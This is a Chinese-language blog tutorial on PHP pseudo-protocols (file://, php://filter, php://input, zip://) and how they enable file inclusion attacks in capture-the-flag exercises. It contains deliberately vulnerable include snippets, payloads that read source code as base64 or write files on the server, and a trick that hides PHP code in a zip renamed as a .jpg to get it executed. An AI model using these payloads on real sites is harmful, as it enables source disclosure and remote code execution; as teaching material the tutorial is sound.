php伪协议漏洞_文件包含漏洞与PHP伪协议

本文详细介绍了PHP中的伪协议,如file://、php://等,以及它们在CTF(Capture The Flag)挑战中的应用。重点讲解了如何利用这些协议进行文件访问、代码执行,同时讨论了相关配置如allow_url_fopen和allow_url_include对安全的影响,并给出了若干示例payload,揭示了PHP伪协议可能带来的安全风险。
摘要由CSDN通过智能技术生成

PHP中支持的伪协议

file:// — 访问本地文件系统

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流(I/O streams)

zlib:// — 压缩流

data:// — 数据(RFC 2397)

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

file://协议

PHP.ini:

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

filebh.php

if(isset($_GET['page']))

{

include $_GET['page'];

}

?>

file:// [文件的绝对路径和文件名]

php://协议

php://filter在双off的情况下也可以正常使用;

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

resource= 这个参数是必须的。它指定了你要筛选过滤的数据流。

read= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

write= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

可以运用多种过滤器(字符串/转换/压缩/加密)

例如平时我们用来任意文件读取的payload

php://filter/read=convert.base64-encode/resource=upload.php

这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode。 resource=upload.php,代表读取upload.php的内容

这样就可以以base64编码的方式读取文件源代码

e1d02aefe7dc047b80e302b86cc5e443.png

过滤器

过滤器有很多种,有字符串过滤器、转换过滤器、压缩过滤器、加密过滤器

string.rot13

进行rot13转换

string.toupper

将字符全部大写

string.tolower

将字符全部小写

string.strip_tags

去除空字符、HTML 和 PHP 标记后的结果。

功能类似于strip_tags()函数,若不想某些字符不被消除,后面跟上字符,可利用字符串或是数组两种方式

举例

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.rot13');

echo "rot13:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.toupper');

echo "Upper:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.tolower');

echo "Lower:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

echo "Del1:";

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE);

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

echo "Del2:";

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "");

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1'));

echo "Del3:";

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

?>

实例模拟

$filename=$_GET["a"];

$data="test test";

file_put_contents($filename, $data);

?>

payload=http://127.0.0.1/xxx.php?a=php://filter/write=string.tolower/resource=test.php

可以往服务器中写入一个文件内容全为小写且文件名为test.php的文件:

f35316d97f243dea30531da51dd6ba24.png

xxx.php

$filename=$_GET["a"];

echo file_get_contents($filename);

?>

ile_get_contents()的$filename参数不仅仅为文件路径,还可以是一个URL(伪协议)。

payload=http://127.0.0.1/xxx.php?a=php://filter/convert.base64-encode/resource=test.php

test.php的内容以base64编码的方式显示出来

344ba0acc1fd8b5fe4f9cc58a9f07e2b.png

xxx.php

$filename=$_GET['a'];

$data="test test";

include("$filename");

?>

payload=http://127.0.0.1/xxx.php?a=php://filter/convert.base64-encode/resource=test.php

同样可以把test.php的内容以base64编码的方式显示出来

双引号包含的变量$filename会被当作正常变量执行,而单引号包含的变量则会被当作字符串执行。

php://input

php://input 是个可以访问请求的原始数据的只读流,可以读取到post没有解析的原始数据, 将post请求中的数据作为PHP代码执行。因为它不依赖于特定的 php.ini 指令。

注:enctype=”multipart/form-data” 的时候 php://input 是无效的。

allow_url_fopen :off/on

allow_url_include:on

xxx.php

echo file_get_contents($_GET["a"]);

?>

c1db801ddb16cf94ee80fe329b4c6cbc.png

但是当PHP代码为:

$test=$_GET['a'];

include($test);

?>

并且当远程包含打开的时候(allow_url_include=on),就可以造成任意代码执行。

zip://, bzip2://, zlib://协议

zip://, bzip2://, zlib://协议

PHP.ini:

zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

3个封装协议,都是直接打开压缩文件。

compress.zlib://file.gz - 处理的是 '.gz' 后缀的压缩包

compress.bzip2://file.bz2 - 处理的是 '.bz2' 后缀的压缩包

zip://archive.zip#dir/file.txt - 处理的是 '.zip' 后缀的压缩包里的文件

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

zip://协议

php 版本大于等于 php5.3.0

使用方法:

zip://archive.zip#dir/file.txt

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]**

要用绝对路径+url编码#

测试:

新建一个名为zip.txt的文件,内容为<?php phpinfo();?>,然后压缩为名为test.zip的zip文件。如果可以上传zip文件则上传zip文件,若不能则重命名为test.jpg后上传。其他几种压缩格式也可以这样操

作。

a96f0626f91fa44beb6c0b70d11a34dd.png

更名为jpg

payload:http://127.0.0.1/xxx.php?a=zip://C:\Users\liuxianglai\Desktop\test.jpg%23zip.txt

a94d1353abc0e79e03bbb5c435639116.png

小结:

b3aebc2f6c6d58afc36daf99ac77856a.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值